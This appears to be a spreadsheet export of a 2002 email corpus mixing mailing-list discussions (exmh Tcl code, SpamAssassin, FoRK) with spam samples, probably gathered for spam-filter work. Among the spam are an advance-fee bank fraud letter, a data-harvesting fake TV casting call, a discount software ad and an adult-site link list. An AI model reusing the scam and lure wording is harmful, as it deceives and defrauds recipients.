 &gt;             set seq [lreplace $seq $ix $ix]
 &gt;         } else {
 &gt;             # Real hack
 &gt;             break
 &gt;         }
 &gt;     }
 &gt; 
 &gt; which is going to run slow if a sequence happens to start with a bunch
 &gt; of messages that don't exist.   I'm not sure why it is important that the
 &gt; first message in the sequence returned exists, but not necessarily any
 &gt; of the others, but I'm sure glad it is, as MhSeqExpand gets called lots,
 &gt; and I don't know if I could cope if it were checking every file in the
 &gt; sequences it is looking at, all the time...
 Although my fingerprints are all over that, it's not actually my code and has 
 been in there since before 1998.  (It's code that I moved from mh.tcl to 
 sequences.tcl and back again).  I'm no5 sure either, but it should be a 
 one-time penalty because the sequence will be re-written with the bad messages 
 removed.  (I think.)
 &gt; It may help to keep a list of the valid message numbers for the current
 &gt; folder (though that would then need to be verified against changes to the
 &gt; directory).   Does tcl have a directory read function?   I assume so...
 &gt; 
 &gt; Mh_Sequence also goes and rereads the files (.mh_sequences and the
 &gt; context file) but I'm not sure how frequently that one is called.
 That *was* a problem, but if you look at Mh_Sequence (and Mh_Sequences and 
 Mh_SequenceUpdate), they all call MhReadSeqs to do the actual reading and it 
 only reads the sequences if the file has been touched.  Look for the 
 "Exmh_Debug Reading $filename" output in the debug log to see when sequences 
 are actually reread from disk.
 My theory is that Ftoc_ShowSequences is being called too often.  I'm about to 
 investigate that.
 &gt;   | I'll email anything I figure out since I'm leaving town in less 
 &gt;   | than 48 hours.
 &gt; 
 &gt; Have a good vacation.
 Thanks.
 Chris
 -- 
 Chris Garrigues                 http://www.DeepEddy.Com/~cwg/
 virCIO                          http://www.virCIO.Com
 716 Congress, Suite 200
 Austin, TX  78701		+1 512 374 0500
   World War III:  The Wrong-Doers Vs. the Evil-Doers.
 --==_Exmh_893671157P
 Content-Type: application/pgp-signature
 -----BEGIN PGP SIGNATURE-----
 Version: GnuPG v1.0.6 (GNU/Linux)
 Comment: Exmh version 2.2_20000822 06/23/2000
 iD8DBQE9bO7PK9b4h5R0IUIRAqBBAJ4uhmwloTb4sSG6jDwcm0ul4RvDegCfe8no
 +6oHNBLG/UnfWMlQoaSidZA=
 =44Ra
 -----END PGP SIGNATURE-----
 --==_Exmh_893671157P--
 _______________________________________________
 Exmh-workers mailing list
 Exmh-workers@redhat.com
 https://listman.redhat.com/mailman/listinfo/exmh-workers
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Mass human sacrifice unearthed in Peru
</t>
  </si>
  <si>
    <t xml:space="preserve">URL: http://www.newsisfree.com/click/-5,8561543,1440/
 Date: Not supplied
 The ancient remains of 200 fishermen who were tied up and stabbed through the 
 heart have been excavated from a beach
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Re: [SAtalk] Lotus Notes users?
</t>
  </si>
  <si>
    <t xml:space="preserve">On Fri, Sep 06, 2002 at 06:22:52PM +0100, Matt Sergeant wrote:
 &gt; Can anyone out there who uses SA with lotus notes users help us figure 
 &gt; out what to tell customers to do when they've got emails coming in with 
 &gt; spam identifying headers? We've been told that Notes has no way to 
 &gt; handle extra headers, but I'm sure that can't be universally true.
 &gt; 
 &gt; I've searched the 'net, and it seems that Notes can only filter based on 
 &gt; the "visible" headers, i.e. sender, subject, precedence, etc. Is there 
 &gt; any way to filter based on X- headers?
 =&gt; Yes the only way out with Notes looks like changing the subject 
 (subject_tag). 
 Regards, 
 SL/
 ---
 Stephane Lentz / Alcanet International - Internet Services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</si>
  <si>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On 9/8/02 8:09 PM, "Gary Lawrence Murphy" &lt;garym@canada.com&gt; wrote:
 &gt; My car is only just over 1.5 meters across and maybe 3 meters long, so
 &gt; that means roughly six pixels total surface area.  You might find a
 &gt; 16-wheeler this way, but how often do people misplace a 16-wheeler
 &gt; such that it is _that_ important to get old images of the terrain?
 &gt; Since they can't send up aircraft to update images in realtime every
 &gt; time, how is this different from just releasing the map on DVDs?  Why
 &gt; wireless?
 It seems that several people are missing the point that this is NOT an image
 database.  It is high-resolution topological data rendered in three
 dimensions.  Images are overlayed on the topological data to help people
 navigate familiar terrain visually.  In other words, it is not intended as a
 wannabe spy satellite.  Rather it is a very accurate three dimensional model
 of the earth's surface.  When a particular region in question is covered in
 a city, the buildings in the city are mapped as though they are part of the
 earth's surface.  The part that makes the app killer is that you can map all
 sorts of data layers on top of their core topological data.
 Got it?
 -James Rogers
  jamesr@best.com
</t>
  </si>
  <si>
    <t xml:space="preserve">The USAF had a program in the 1959-1960 in which successful free jumps 
 were made from balloons at up to ~32 km (100,000 ft.). The relevance was 
 astronauts and SR-71 bailouts. This would top that achievement 
 comfortably.
 http://www.wpafb.af.mil/museum/history/postwwii/pe.htm
 Chuck
 On Monday, September 9, 2002, at 11:20 AM, Owen Byrne wrote:
 &gt; John Hall wrote:
 &gt;
 &gt;&gt; Why so fast?  Normal terminal velocity is much slower.
 &gt;&gt;
 &gt; Not at 40,000 m. I found this article 
 &gt; (http://www.wired.com/news/print/0,1294,53928,00.html) :
 &gt;
 &gt; "The last person to try to break the highest free fall record died in 
 &gt; the attempt. In 1965, New Jersey truck driver Nick Piantanida suffered 
 &gt; catastrophic equipment failure when his facemask blew out at 57,000 
 &gt; feet. Lack of oxygen caused such severe brain damage that he went into 
 &gt; a coma and died four months later."
 &gt;
 &gt; And in amongst the flash at
 &gt; http://www.legrandsaut.org/site_en/
 &gt;
 &gt; you can discover that he will break the sound barrier at 35,000 m,
 &gt; presumably reaching top speed somewhere above 30,000.
 &gt;
 &gt; Owen
 &gt;
 &gt;&gt;
 &gt;&gt;&gt; -----Original Message-----
 &gt;&gt;&gt; From: fork-admin@xent.com [mailto:fork-admin@xent.com] On Behalf Of
 &gt;&gt;&gt; bitbitch@magnesium.net
 &gt;&gt;&gt; Sent: Sunday, September 08, 2002 8:36 AM
 &gt;&gt;&gt; To: (Robert Harley)
 &gt;&gt;&gt; Cc: fork@spamassassin.taint.org
 &gt;&gt;&gt; Subject: Re: The Big Jump
 &gt;&gt;&gt;
 &gt;&gt;&gt;
 &gt;&gt;&gt;
 &gt;&gt;&gt; So uh, would this qualify for the Darwin awards if he doesn't make it?
 &gt;&gt;&gt;
 &gt;&gt;&gt; Freaking french people...
 &gt;&gt;&gt;   :-)
 &gt;&gt;&gt; -BB
 &gt;&gt;&gt; RH&gt; Today a French officer called Michel Fournier is supposed to get
 &gt;&gt;&gt;
 &gt;&gt; in a
 &gt;&gt;
 &gt;&gt;&gt; RH&gt; 350-metre tall helium balloon, ride it up to the edge of space (40
 &gt;&gt;&gt;
 &gt;&gt; km
 &gt;&gt;
 &gt;&gt;&gt; RH&gt; altitude) and jump out.  His fall should last 6.5 minutes and
 &gt;&gt;&gt;
 &gt;&gt; reach
 &gt;&gt;
 &gt;&gt;&gt; RH&gt; speeds of Mach 1.5.  He hopes to open his parachute manually at
 &gt;&gt;&gt;
 &gt;&gt; the
 &gt;&gt;
 &gt;&gt;&gt; RH&gt; end, although with an automatic backup if he is 7 seconds from the
 &gt;&gt;&gt; RH&gt; ground and still hasn't opened it.
 &gt;&gt;&gt;
 &gt;&gt;&gt; RH&gt; R
 &gt;&gt;&gt;
 &gt;&gt;&gt; RH&gt; ObQuote:
 &gt;&gt;&gt; RH&gt;   "Veder, si aver si grossi li coglioni, come ha il re di
 &gt;&gt;&gt;
 &gt;&gt; Franza."
 &gt;&gt;
 &gt;&gt;&gt; RH&gt;   ("Let's see if I've got as much balls as the King of France!")
 &gt;&gt;&gt; RH&gt;   - Pope Julius II, 2 January 1511
 &gt;&gt;&gt;
 &gt;&gt;&gt;
 &gt;&gt;&gt;
 &gt;&gt;&gt; --
 &gt;&gt;&gt; Best regards,
 &gt;&gt;&gt; bitbitch                            mailto:bitbitch@magnesium.net
 &gt;&gt;&gt;
 &gt;&gt;
 &gt;&gt;
 &gt;&gt;
 &gt;
 &gt;
 &gt;
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Reunion!
</t>
  </si>
  <si>
    <t xml:space="preserve">
 I am a TV producer for one of the three major networks and
 I am working on a new primetime special. We're looking for a 
 special story and thought you might be able to assist.
 THIS IS NOT A SALES PITCH FOR ANYTHING! 
 I AM REALLY LOOKING FOR A GREAT STORY!
 -----------------
 PLEASE READ THIS! 
 -----------------
 Here's the type of story we are seeking;
 Are you interested in finding a long lost love from 
 your past? 
 Your first love? 
 The one that got away?
 If you are, WE MAY BE ABLE TO MAKE YOUR DREAM COME TRUE!
 (if you are not, PLEASE send this to your single friends)
 To be considered for this rare national TV opportunity, 
 you MUST;
 1. Be single and available
 2. Have a sincere interest to find a former love
 3. Be willing to share your story on NATIONAL TV
 4. Be able to travel to Los Angeles (We pay for everything)
 If this is YOU...then here's what you need to do next-
 1. Reply to this email.
 2. Tell us WHO you are looking for. 
 3. Tell us WHY you want to find him/her. (Let your feelings out)
 4. Tell us WHERE they were last time you saw them (specifics)
 5. Tell us how to reach YOU BY PHONE- HOME, WORK, CELL, email
 If we cannot reach you, we will have to move on without you!
 We only need ONE story, so if you want it to be you...
 REPLY IMMEDIATELY!
 We look forward to getting your reply...SOON!
 Good luck!
 p.s. REMEMBER TO GIVE US A WAY TO REACH YOU BY PHONE TODAY!
</t>
  </si>
  <si>
    <t xml:space="preserve">
 --- begin forwarded text
 Date: Mon, 16 Sep 2002 14:57:27 -0700
 To: nettime-l@bbs.thing.net
 From: Phil Duncan &lt;PDuncan@AggregateStudio.com&gt;
 Subject: &lt;nettime&gt; The War Prayer
 Sender: nettime-l-request@bbs.thing.net
 Reply-To: Phil Duncan &lt;PDuncan@AggregateStudio.com&gt;
 The following prayer is from a story by Mark Twain, and was quoted by Lewis
 Laphan in the October issue of Harper's magazine. It occurs at the very end
 of an excellent article which I recommend to you.
 In the story, an old man enters a church where the congregation has been
 listening to an heroic sermon about "the glory to be won in battle by young
 patriots armed with the love of God." He usurps the pulpit and prays the
 following:
 "O Lord our God, help us to tear their soldiers to bloody shreads with our
 shells; help us to cover their smiling fields with the pale forms of their
 patriot dead; help us to drown the thunder of the guns with the shrieks of
 their wounded, writhing in pain; help us to lay waste their humble homes with
 a hurricane of fire; help us to wring the hearts of their unoffending widows
 with unavailing grief; help us to turn them out roofless with their little
 children to wander unfriended the wastes of their desolated land in rags and
 hunger and thirst, sports of the sun flames in summer and the icy winds of
 winter, broken in spirit, worn with travail, imploring Thee for the refuge of
 the grave and denied it -- for our sakes who adore Thee, Lord, blast their
 hopes, blight their lives, protract their bitter pilgrimage, make heavy their
 steps, water their way with their tears, stain the white snow with the blood
 of their wounded feet! We ask it, in the spirit of love, of Him Who is the
 Source of Love, and Who is the ever-faithful refuge and friend of all that
 are sore beset and seek His aid with humble and contrite hearts. Amen."
 Twain wrote the story, "The War Prayer," in 1905 during the American
 occupation of the Philippines, but the story wasn't printed until 1923,
 thirteen years after his death, because the editors thought it "unsuitable"
 for publication at the time it was written.
 #  distributed via &lt;nettime&gt;: no commercial use without permission
 #  &lt;nettime&gt; is a moderated mailing list for net criticism,
 #  collaborative text filtering and cultural politics of the nets
 #  more info: majordomo@bbs.thing.net and "info nettime-l" in the msg body
 #  archive: http://www.nettime.org contact: nettime@bbs.thing.net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</si>
  <si>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Fw: VIRUS PROTECTION IS A MUST, YOU NEED SYSTEMWORKS! CPTJ
</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;html&gt;
 &lt;head&gt;
 &lt;meta http-equiv=3D"Content-Language" content=3D"en-us"&gt;
 &lt;meta name=3D"GENERATOR" content=3D"Microsoft FrontPage 4.0"&gt;
 &lt;meta name=3D"ProgId" content=3D"FrontPage.Editor.Document"&gt;
 &lt;meta http-equiv=3D"Content-Type" content=3D"text/html; charset=3Dwindows-=
 1252"&gt;
 &lt;title&gt;Norton AD&lt;/title&gt;
 &lt;/head&gt;
 &lt;body&gt;
 &lt;table border=3D"0" width=3D"489" height=3D"54" bgcolor=3D"#FFFFFF"&gt;
   &lt;tr&gt;
     &lt;td width=3D"100%" height=3D"48" bgcolor=3D"#FFFFFF" align=3D"center"&gt;=
 &lt;font face=3D"Impact" color=3D"#CC0000" size=3D"3"&gt;Take
       Control of Your Computer With This Top-of-the-Line Software!&lt;/font&gt;&lt;=
 /td&gt;
   &lt;/tr&gt;
 &lt;/table&gt;
 &lt;table border=3D"5" cellspacing=3D"3" width=3D"489" cellpadding=3D"3" bgco=
 lor=3D"#990033"  bordercolor=3D"#FFFFFF" style=3D"border-collapse: collaps=
 e" bordercolordark=3D"#000000" height=3D"567" bordercolorlight=3D"#FFFF99"=
 &gt;
   &lt;tr&gt;
     &lt;td width=3D"467" height=3D"555" bordercolorlight=3D"#FFFFFF" borderco=
 lordark=3D"#FFFF99"&gt;
       &lt;table border=3D"6" width=3D"100%" height=3D"86" bgcolor=3D"#FFFF99"=
  bordercolor=3D"#FFFFFF"&gt;
         &lt;tr&gt;
           &lt;td width=3D"100%" height=3D"80" align=3D"center"&gt;&lt;b&gt;&lt;font color=
 =3D"#FF0000" face=3D"Tahoma" size=3D"6"&gt;Norton
             SystemWorks 2002 &lt;/font&gt;&lt;font face=3D"Tahoma" size=3D"5" color=
 =3D"#000000"&gt; Software Suite&lt;/font&gt;&lt;font color=3D"#FF0000" face=3D"Times N=
 ew Roman" size=3D"6"&gt;&lt;br&gt;
             -&lt;i&gt;Professional Edition&lt;/i&gt;-&lt;/font&gt;&lt;/b&gt;&lt;/td&gt;
         &lt;/tr&gt;
       &lt;/table&gt;
       &lt;table border=3D"0" width=3D"100%" height=3D"62"&gt;
         &lt;tr&gt;
           &lt;td width=3D"100%" height=3D"56" align=3D"center"&gt;&lt;b&gt;&lt;font face=3D=
 "Tahoma" color=3D"#FFFFFF" size=3D"4"&gt;Includes
             Six - &lt;/font&gt;&lt;i&gt;&lt;font face=3D"Tahoma" size=3D"4" color=3D"#FFF=
 F99"&gt;Yes 6!&lt;/font&gt;&lt;/i&gt;&lt;font face=3D"Tahoma" color=3D"#FFFFFF" size=3D"4"&gt; 
             - Feature-Packed Utilities&lt;br&gt;ALL for &lt;/font&gt;&lt;font face=3D"Tah=
 oma" size=3D"4" color=3D"#FFFF99"&gt;1&lt;/font&gt;&lt;font face=3D"Tahoma" color=3D"#=
 FFFFFF" size=3D"4"&gt;
             Special &lt;/font&gt;&lt;font face=3D"Tahoma" size=3D"4" color=3D"#FFFF=
 99"&gt;LOW&lt;/font&gt;&lt;font face=3D"Tahoma" color=3D"#FFFFFF" size=3D"4"&gt;
             Price of &lt;/font&gt;&lt;font face=3D"Tahoma" size=3D"4" color=3D"#FFF=
 F99"&gt;Only
             $29.99!&lt;/font&gt;&lt;/b&gt;&lt;/td&gt;
         &lt;/tr&gt;
       &lt;/table&gt;
       &lt;table border=3D"4" width=3D"100%" height=3D"135" bgcolor=3D"#800000=
 " bordercolor=3D"#FFFFFF"&gt;
         &lt;tr&gt;
           &lt;td width=3D"100%" height=3D"129" bgcolor=3D"#FFFF99" bordercolo=
 r=3D"#800000"&gt;&lt;b&gt;&lt;font face=3D"Tahoma" size=3D"2"&gt;&lt;font color=3D"#000000"&gt;=
 This
             Software Will:&lt;/font&gt;&lt;font color=3D"#FFFFFF"&gt;&lt;br&gt;&amp;nbsp;&lt;/font&gt;=
 &lt;font color=3D"#FF0000"&gt;-
             Protect your computer from unwanted and &lt;i&gt; hazardous&lt;/i&gt;  vir=
 uses&lt;br&gt;&amp;nbsp;-
             Help secure your private &amp;amp; valuable information&lt;br&gt;&amp;nbsp;-=
  Allow
             you to transfer files and send e-mails &lt;u&gt; safely&lt;/u&gt;&lt;br&gt;&amp;nbsp=
 ;-
             Backup your ALL your data quick and easily&lt;br&gt;&amp;nbsp;- Improve =
 your
             PC's performance w/&lt;i&gt;superior&lt;/i&gt;
             integral diagnostics!&lt;br&gt;&amp;nbsp;- &lt;i&gt;You'll NEVER have to take =
 your
             PC to the repair shop AGAIN!&lt;/i&gt;&lt;/font&gt;&lt;/font&gt;&lt;/b&gt;&lt;/td&gt;
         &lt;/tr&gt;
       &lt;/table&gt;&amp;nbsp;
       &lt;table border=3D"4" width=3D"100%" height=3D"4" bgcolor=3D"#FFFFFF" =
 bordercolor=3D"#FFFF99"&gt;
         &lt;tr&gt;
           &lt;td width=3D"100%" height=3D"1"&gt;
             &lt;p align=3D"center"&gt;&lt;b&gt;&lt;font size=3D"5" face=3D"Tahoma"&gt;&lt;font =
 color=3D"#000000"&gt;&lt;font color=3D"#ff0000"&gt;6&lt;/font&gt;
             Feature-Packed Utilities
             &lt;/font&gt;&lt;font color=3D"#000080" size=3D"5"&gt;&lt;br&gt;&lt;/font&gt;&lt;u&gt;&lt;font =
 color=3D"#ff0000"&gt;1&lt;/font&gt;&lt;font color=3D"#000000"&gt;
             Great Price&lt;/font&gt;&lt;/u&gt;&lt;font color=3D"#000000" size=3D"5"&gt; &lt;br&gt;
             A &lt;font color=3D"#ff0000"&gt;$300+&lt;/font&gt;  
             Combined Retail Value
             &lt;/font&gt;
             &lt;i&gt;&lt;font color=3D"#FF0000"&gt;YOURS&lt;/font&gt;&lt;/i&gt; &lt;font color=3D"#00=
 0000"&gt; for
             Only &lt;font color=3D"#ff0000"&gt;$29.99!&lt;/font&gt;
             &lt;/font&gt;&lt;/font&gt;&lt;font size=3D"6"&gt;&lt;br&gt;
             &lt;/font&gt;&lt;/b&gt;&lt;font face=3D"Tahoma" size=3D"4"&gt;&lt;font color=3D"#00=
 0000"&gt;&amp;lt;
             Price Includes &lt;/font&gt;&lt;font color=3D"#FF0000"&gt;FREE&lt;/font&gt;&lt;font=
  color=3D"#000080"&gt; 
             &lt;/font&gt;&lt;font color=3D"#000000"&gt;Shipping! &amp;gt;&lt;br&gt;&lt;/font&gt;&lt;/font=
 &gt;&lt;font color=3D"#FF0000" size=3D"3" face=3D"Impact"&gt;And
             For a Limited time Buy Any 2 of Our Products &amp;amp; Get 1 Free!=
 &lt;/font&gt;&lt;/td&gt;
         &lt;/tr&gt;
       &lt;/table&gt;
     &lt;p align=3D"Center"&gt;&lt;b&gt; &lt;font face=3D"Arial" size=3D"3" color=3D"#FFFF=
 FF"&gt;Don't fall
     prey to destructive viruses or hackers!&lt;br&gt;Protect&amp;nbsp; your computer=
  and
     your valuable information and&lt;/font&gt;&lt;/b&gt;&lt;/p&gt;
       &lt;table border=3D"4" width=3D"100%" height=3D"44" bordercolor=3D"#FFF=
 F99" bgcolor=3D"#FFFF99"&gt;
         &lt;tr&gt;
           &lt;td width=3D"100%" height=3D"38" bgcolor=3D"#FFFFFF" align=3D"ce=
 nter"&gt;&lt;b&gt;&lt;a href=3D"http://64.251.23.141/affiliates/norton/systemworkse123=
 .htm" style=3D"color: #FF0000; font-family: Verdana; font-size: 14pt; font=
 -weight: bold"&gt;&lt;font face=3D"Tahoma" size=3D"4" color=3D"#FF0000"&gt;-&amp;gt;
             CLICK HERE to Order Yours NOW! &amp;lt;-&lt;/font&gt;&lt;/a&gt;&lt;/b&gt;&lt;/td&gt;
         &lt;/tr&gt;
       &lt;/table&gt;
       &lt;p align=3D"Center"&gt;&lt;font face=3D"Verdana" size=3D"5" color=3D"#FFFF=
 99"&gt;&lt;b&gt;&lt;/b&gt;&lt;/font&gt;&lt;/p&gt;
       &lt;p align=3D"Center"&gt;&lt;font color=3D"#ffffff" size=3D"1" face=3D"Tahom=
 a"&gt;Your email
       address was obtained from an opt-in list. Opt-in UEFAS (United Email
       Federation Against Spam) Approved List - &amp;nbsp;Purchase Code #
       34374064.&amp;nbsp;&amp;nbsp;If you wish to be unsubscribed from this list, =
 please &lt;a style=3D"COLOR: #ffffcc" href=3D"http://64.251.23.141/affiliates=
 /norton/removeme.html"&gt;Click
       here&lt;/a&gt; . If you have previously unsubscribed and are still receivi=
 ng
       this message, you may email our &lt;a style=3D"COLOR: #ffffcc" href=3D"=
 http://64.251.23.141/affiliates/norton/removeme.html"&gt;Spam
       Abuse Control Center&lt;/a&gt;. We do not condone spam in any shape or for=
 m.
       Thank You kindly for your cooperation.&lt;/font&gt;&lt;/td&gt;
   &lt;/tr&gt;
 &lt;/table&gt;
 &lt;/body&gt;
 &lt;/html&gt;
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: 1 IIU admin request(s) waiting
</t>
  </si>
  <si>
    <t xml:space="preserve">The IIU@iiu.taint.org mailing list has 1 request(s) waiting for your
 consideration at:
 	http://iiu.taint.org/mailman/admindb/iiu
 Please attend to this at your earliest convenience.  This notice of
 pending requests, if any, will be sent out daily.
 Pending posts:
      From: emailharvest@email.com on Wed Jul 31 17:08:17 2002
     Cause: Post by non-member to a members-only list
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: [ILUG] DEAL
</t>
  </si>
  <si>
    <t xml:space="preserve">SUBJECT: 
                    Urgent Concern Pls.
 I am a serious officer with one of our main branches of CITI BANK,
 consumer Banking Department. Although we didn't have previous correspondence till date.
 However, based on the standard value place on everything about you,  I believed we could discuss, analyze and execute this transaction.The transaction is thus:
 I've a wealthy client, an American Citizen who had been residing in West Africa for decades now, he operates a fix deposit account with us which I am his account officer, and also 
 receives standing orders  for his chains of dividends share.
 However, this client Mr. David Brown died as an  out come of Heart attack,and the funds in his current account has  been claimed by his family, who had gone back finally to USA.
 At the end of Fiscal year, March 2001, an  accumulated share of US$12.360M was transferred into his account from the Stock Exchange.
 This was alone the instructions we issued to the Stock House to dispose all his stocks.
 Now the funds has arrived, I needed an associate whom I would present as the inheritor of this fund i.e. Associate partner of Mr. David Brown so as to receive this fund.
 Please note, his family has left since,and never  know about this stocks in the exchange and the funds has subsequently matured in his Fix Deposit Account, so I as the account officer 
 has prepared all documents for easy claims of this fund.
 Immediately, you reach me, I will furnish you  with further details and then negotiate on the sharing ratio once you show your sincere involvement to go along with me. It will be of 
 need for you to furnish me also your personal phone and fax  numbers for urgent
 messages. 
 I am anxiously waiting to hear your consent. 
 Be guided.
 Thanking you .Yours sincerely,
 Dave Framo.
 -- 
 Irish Linux Users' Group: ilug@linux.ie
 http://www.linux.ie/mailman/listinfo/ilug for (un)subscription information.
 List maintainer: listmaster@linux.ie
</t>
  </si>
  <si>
    <t xml:space="preserve">On Friday, July 26, 2002, at 12:19 PM, James Rogers wrote:
 &gt; On Fri, 2002-07-26 at 11:50, Ian Andrew Bell wrote:
 &gt;&gt; The ruling class, whether you define them as government or business
 &gt;&gt; (what's the difference?) knows full well where that money is.  It's
 &gt;&gt; lining their pockets, buying their hobby ranches, and financing
 &gt;&gt; their private jets.
 &gt;&gt;
 &gt;&gt; Neither has any interest in the welfare of the working class.
 &gt;
 &gt; Yes, and the working class deserves what it gets, and possibly not even
 &gt; that.  For the most part, people become wealthy by not being stupid.  I
 &gt; always thought "not being stupid (most of the time)" was a fairly low
 &gt; bar, but apparently most people can't even manage that.
 This isn't particularly well-founded logic.  What you're saying is 
 that "most rich people are smart" and that the latter is causal to 
 the former.  By implication, then, you would say that "most poor 
 people are stupid".  This is true, statistically, because most 
 people are poor and most people are also stupid.  However there's 
 nothing to indicate a causal link there.  So being smart isn't the 
 only mechanical requirement to eternal wealth because, obviously, 
 most of the members of this list would be rich.
 Being smart, for example, has made Stephen Hawking famous and 
 respected, but he's not particularly rich.  Jennifer Lopez is by 
 all accounts a complete moron.  In fact, spend a weekend in Beverly 
 Hills and you will encounter vast numbers of people who are 
 profoundly stupid driving Rolls Royces and shopping at PRADA.
 The working class IS the market and the working class IS where 
 wealth is created.  The working class makes long-distance calls, 
 buys food processors and computers and clothes, and attaches the 
 value to goods which allows them to be commodified.  The working 
 class saves money, buys Retirement Savings Plans, and invests in 
 mutual funds which increases the flow of capital through the 
 investment funnel.
 The economic system of the first world is designed to strike a 
 delicate balance between incentivizing the ruling class to support 
 wealth-expanding through technological innovation or the 
 development of new markets.  At the 100,000 foot level, recessions 
 and depressions are created when more wealth is sucked from the 
 whirlpool than can be supported by the working class through 
 investment and consumption.
 And the people draining the hot tub are the folks in the ruling 
 class -- people like Ken Lay, Dick Cheney, Bernie Ebbers, et al -- 
 and they simply got too greedy and caused a bubble in the 
 hydraulics that increased the pressure for a time, but ultimately 
 wasn't sustainable.
 And the money that was lost did not come from the ruling class.  It 
 came from the RSP's and the Equity funds and the Investments of 
 individual working class -- people who believed these reports and 
 invested.  The wealth of the ruling class was largely pulled out by 
 the time such investments were exposed to the workers.
 So, is the lower caste necessarily stupid for saving money or 
 investing in retirement plans?  I don't think so.  Are they stupid 
 for buying clothes and automobiles?  I don't think so.
 At the granular level, the notion that "most rich people are rich 
 because they're smart" is so anecdotal and naive that it's not 
 worth arguing about, so I won't.  Still, a compelling point worth 
 some clarification.
 -Ian.
 http://xent.com/mailman/listinfo/fork
</t>
  </si>
  <si>
    <t xml:space="preserve">    Date:        Mon, 26 Aug 2002 09:27:56 -0500
     From:        Chris Garrigues &lt;cwg-dated-1030804078.e8b0d5@DeepEddy.Com&gt;
     Message-ID:  &lt;1030372078.11075.TMDA@deepeddy.vircio.com&gt;
   | Tell me what keystroke made it happen so I can reproduce it and I'll
   | see what I can do about it (or if I can't, I'll hand it off to Brent).
 Don't worry too much about it, you seem to have plenty of other things
 to do in the immediate future, and this one isn't so critical that people
 can't use the code in normal ways.
 But, to make it happen, type (with normal key bindings) any digit, so the
 code thinks you're trying a message number, then backspace, so the digit
 goes away, then '-' (other junk characters don't seem to have the
 problem, I have just been playing).   That will do it (every time).
 That is: 0 ^h -
 Once you get into that state, the same traceback occurs for every
 character you type, until a message is selected with the mouse.
 This is looking like it might be easy to find and fix, so I'll take a
 look at it later.
 kre
 _______________________________________________
 Exmh-workers mailing list
 Exmh-workers@redhat.com
 https://listman.redhat.com/mailman/listinfo/exmh-workers
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Your monthly LaXPress Adults Only Newsletter 
</t>
  </si>
  <si>
    <t xml:space="preserve">Dear LAXPress.com customer,
 You are receiving this email as a result of having joined one of our opt-in adults only newsletter services.
 If you feel this is in error or someone added your email address without your authorization, please scroll to the BOTTOM of this email and click on the "remove" hyperlink. You will be removed AUTOMATICALLY.
 THIS MONTH'S SPECIAL OFFERS!
 * * * * * FREE Personals * * * * *
 For a limited time, we are offering all our customers the option to place their own adults only personals (PHOTO OR NON-PHOTO) ad at LAXPress.com AT NO CHARGE! 
 * * * * * FREE LIVE NUDE CHATROOMS | NO CHARGE FOR ACCESS ! * * * * *
 Get access to live nude chatrooms from all over the world featuring sexy girls and guys! 
 Sincerely,
 Nicole Webster
 http://www.laxpress.com/?opt-in-newsletter
 P.S. Looking for a great adult search engine? Go to http://www.sexindexer.com/?laxpress
 Also, check out these 50 NEW ultimate adults only sites!
 http://www.laxpress.com/50SITES/adultupskirts.html
 http://www.laxpress.com/50SITES/allpetite.html
 http://www.laxpress.com/50SITES/amateurfreedom.html
 http://www.laxpress.com/50SITES/amateuruniversity.html
 http://www.laxpress.com/50SITES/analdebutants.html
 http://www.laxpress.com/50SITES/asianexxxstacy.html
 http://www.laxpress.com/50SITES/averagegirls.html
 http://www.laxpress.com/50SITES/bearlovin.html
 http://www.laxpress.com/50SITES/blackdesires.html
 http://www.laxpress.com/50SITES/boytoylive.html
 http://www.laxpress.com/50SITES/breathlessboys.html
 http://www.laxpress.com/50SITES/chixwithdix.html
 http://www.laxpress.com/50SITES/cutegirlfriend.html
 http://www.laxpress.com/50SITES/dailyxxxstories.html
 http://www.laxpress.com/50SITES/darkdamsels.html
 http://www.laxpress.com/50SITES/darkobsessions.html
 http://www.laxpress.com/50SITES/dudedorm.html
 http://www.laxpress.com/50SITES/ebonyonivory.html
 http://www.laxpress.com/50SITES/eldererotica.html
 http://www.laxpress.com/50SITES/expectingsex.html
 http://www.laxpress.com/50SITES/exquisiteasians.html
 http://www.laxpress.com/50SITES/extremesex.html
 http://www.laxpress.com/50SITES/fantasticfacials.html
 http://www.laxpress.com/50SITES/fatfantasies.html
 http://www.laxpress.com/50SITES/femdomination.html
 http://www.laxpress.com/50SITES/gayultra.html
 http://www.laxpress.com/50SITES/goldentrickle.html
 http://www.laxpress.com/50SITES/granniesnfatties.html
 http://www.laxpress.com/50SITES/hardcoredigital.html
 http://www.laxpress.com/50SITES/hardcoremaidens.html
 http://www.laxpress.com/50SITES/hardinterracial.html
 http://www.laxpress.com/50SITES/hentaistudios.html
 http://www.laxpress.com/50SITES/justtoons.html
 http://www.laxpress.com/50SITES/ladiessecret.html
 http://www.laxpress.com/50SITES/latinafetish.html
 http://www.laxpress.com/50SITES/legsnfeet.html
 http://www.laxpress.com/50SITES/lesbianbordello.html
 http://www.laxpress.com/50SITES/lickinlovers.html
 http://www.laxpress.com/50SITES/massivemammories.html
 http://www.laxpress.com/50SITES/maturedames.html
 http://www.laxpress.com/50SITES/maturetouch.html
 http://www.laxpress.com/50SITES/orallovers.html
 http://www.laxpress.com/50SITES/pinkchocolate.html
 http://www.laxpress.com/50SITES/pussyquota.html
 http://www.laxpress.com/50SITES/rawsexvideos.html
 http://www.laxpress.com/50SITES/seemepee.html
 http://www.laxpress.com/50SITES/sexyblondes.html
 http://www.laxpress.com/50SITES/sexybrunettes.html
 http://www.laxpress.com/50SITES/sexyredheads.html
 http://www.laxpress.com/50SITES/sexysmokers.html
 http://www.laxpress.com/50SITES/sexytranssexual.html
 http://www.laxpress.com/50SITES/shemalelounge.html
 http://www.laxpress.com/50SITES/sinfulhardcore.html
 http://www.laxpress.com/50SITES/teenboyz.html
 http://www.laxpress.com/50SITES/teendreamer.html
 http://www.laxpress.com/50SITES/teenmaidens.html
 http://www.laxpress.com/50SITES/totallytits.html
 http://www.laxpress.com/50SITES/uniformboys.html
 http://www.laxpress.com/50SITES/voyeuraddicts.html
 http://www.laxpress.com/50SITES/voyeurdorm.html
 http://www.laxpress.com/50SITES/voyeurlounge.html
 -------------------------------------------------------------------------
 To be removed from this mailing list
 click on the link below 
